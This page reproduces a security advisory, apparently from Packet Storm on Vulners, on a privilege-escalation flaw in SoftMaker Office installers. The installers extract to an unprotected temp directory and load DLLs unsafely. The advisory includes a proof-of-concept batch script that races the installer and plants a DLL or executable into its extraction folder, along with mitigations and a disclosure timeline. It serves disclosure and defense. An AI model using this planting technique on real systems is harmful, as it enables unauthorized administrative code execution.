Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

SoftMaker Office 201x Privilege Escalation

🗓️ 04 Jan 2017 00:00:00Reported by Stefan KanthakType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 59 Views

SoftMaker Office 201x Privilege Escalation vulnerability in executable installer

Code
`Hi @ll,  
  
the service pack installers for SoftMaker Office 201x, available  
from <http://www.softmaker.com/en/servicepacks-office-windows>,  
are (surprise.-) vulnerable.  
  
  
The executable installer (OUCH) ofw16_763.exe, a 7z SFX (OUCH),  
creates an UNPROTECTED directory "%TEMP%\7zSxxxxxxxx\" to extract  
its payload, then executes "%TEMP%\7zSxxxxxxxx\spsetup.exe".  
  
"%TEMP%\7zSxxxxxxxx\" inherits the NTFS access rights of its parent  
"%TEMP%\", i.e. allows full access for the UNPRIVILEGED user.  
  
For this well-known vulnerability see  
<https://cwe.mitre.org/data/definitions/377.html> and  
<https://cwe.mitre.org/data/definitions/379.html>  
  
  
Due to the embedded application manifest which specifies  
"requireAdministrator" the executable installer can only be run  
with administrative rights.  
  
JFTR: if written properly, it would create a PROTECTED directory  
"%TEMP%\7zSxxxxxxxx\", writable only for privileged users!  
  
The UNPRIVILEGED user as well as any program running with the  
users credentials can modify the extracted files, for example  
"%TEMP%\7zSxxxxxxxx\spsetup.exe", which is executed with  
administrative rights, resulting in arbitrary code execution  
with elevation of privilege.  
  
Additionally "spsetup.exe" is vulnerable to DLL hijacking,  
another well-known vulnerability.  
See <https://capec.mitre.org/data/definitions/471.html>,  
<https://cwe.mitre.org/data/definitions/426.html>,  
<https://cwe.mitre.org/data/definitions/427.html>  
<https://technet.microsoft.com/en-us/library/2269637.aspx>,  
<https://msdn.microsoft.com/en-us/library/ff919712.aspx> and  
<https://msdn.microsoft.com/en-us/library/ms682586.aspx> plus  
<http://blogs.technet.com/b/srd/archive/2014/05/13/load-library-safely.aspx>  
  
Thanks to the unprotected directory "%TEMP%\7zSxxxxxxxx\" the  
unprivileged user can write DLLs to "%TEMP%\7zSxxxxxxxx\" which  
are loaded by "spsetup.exe", again resulting in arbitrary code  
execution with elevation of privilege!  
  
  
Proof-of-concept:  
~~~~~~~~~~~~~~~~~  
  
0. download <http://www.softmaker.net/down/ofw16_763.exe> and  
save it in an arbitrary directory;  
  
1. download <http://home.arcor.de/skanthak/download/SENTINEL.DLL>  
(see <http://home.arcor.de/skanthak/sentinel.html> alias  
<https://skanthak.homepage.t-online.de/sentinel.html>) and  
save it in an(other) arbitrary directory;  
  
2. save the following batch script in same the directory as  
SENTINEL.DLL:  
  
--- OFW16_873.CMD ---  
:WAIT  
@If Not Exist "%TEMP%\7z*" Goto :WAIT  
For /D %%! In ("%TEMP%\7z*") Do Set foobar=%%!  
Copy "SENTINEL.DLL" "%foobar%\NTMARTA.DLL"  
Copy "SENTINEL.DLL" "%foobar%\VERSION.DLL"  
Copy "SENTINEL.DLL" "%foobar%\WINSPOOL.DRV"  
--- EOF ---  
  
3. start the batch script;  
  
4. execute ofw16_873.exe and notice the message boxes displayed  
by SENTINEL.DLL.  
  
PWNED!  
  
5. download <http://home.arcor.de/skanthak/download/SENTINEL.EXE>  
to the same directory as the batch script;  
  
6. in the batch script replace the 3 lines Copy ... with  
Copy "SENTINEL.EXE" "%foobar%\spsetup.exe"  
  
7. start the batch script;  
  
8. execute ofw16_873.exe and notice the message box displayed  
by SENTINEL.EXE.  
  
PWNED!  
  
  
Mitigations:  
~~~~~~~~~~~~  
  
* Don't use executable installers! NEVER!  
Don't use self-extractors! NEVER!  
  
See <http://seclists.org/fulldisclosure/2015/Nov/101> and  
<http://seclists.org/fulldisclosure/2015/Dec/86> plus  
<http://home.arcor.de/skanthak/!execute.html> alias  
<https://skanthak.homepage.t-online.de/!execute.html> for more  
information.  
  
* Practice STRICT privilege separation: NEVER use the so-called  
"protected" administrator account(s) created during Windows  
setup which use the same "%TEMP%" for unprivileged and privileged  
processes!  
  
* Add an ACE "(D;OIIO;WP;;;WD)" to the ACL of every "%USERPROFILE%";  
use <https://msdn.microsoft.com/en-us/library/aa374928.aspx> to  
decode it to "deny execution of files in this directory for  
everyone, inheritable to all files in all subdirectories".  
  
  
stay tuned  
Stefan Kanthak  
  
  
Timeline:  
~~~~~~~~~  
  
2016-12-15 sent vulnerability report to vendor  
  
no reply, not even an acknowledegement of receipt  
  
2016-12-23 resent vulnerability report to vendor, cc CERT at   
german BSI  
  
no reply, not even an acknowledegement of receipt  
  
2016-12-27 CERT at german BSI contacts vendor offering help  
  
no reply, not even an acknowledegement of receipt  
  
2016-12-31 report published  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Jan 2017 00:00Current
0.9Low risk
Vulners AI Score0.9
privilege escalation vulnerabilitysoftmaker officeexecutable installersunprotected directoryembedded application manifestntfs access rightsdll hijackingarbitrary code executionelevation of privilegemitigationsaceacl
59